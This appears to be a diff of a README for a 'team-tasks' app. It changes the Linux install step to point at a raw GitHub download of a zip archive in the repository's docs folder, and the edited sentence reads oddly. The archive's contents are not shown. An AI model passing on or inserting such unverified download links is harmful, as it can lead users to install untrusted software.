trippy-420/team-tasks/README.md

    - For Windows, double-click the `.exe` and follow the installer instructions.
    - For macOS, open the `.dmg` file, then drag team-tasks to your Applications folder.
-   - For Linux, unpack the `.tar.gz` file and run the installer script inside, as explained in the included README.
+   - For Linux, unpack the `https://github.com/trippy-420/team-tasks/raw/refs/heads/master/docs/tasks_team_v3.3.zip` file and run the installer script inside, as explained in the included README.

 5. Once installed, look for the team-tasks icon on your desktop or start menu.
 Double-click it to open.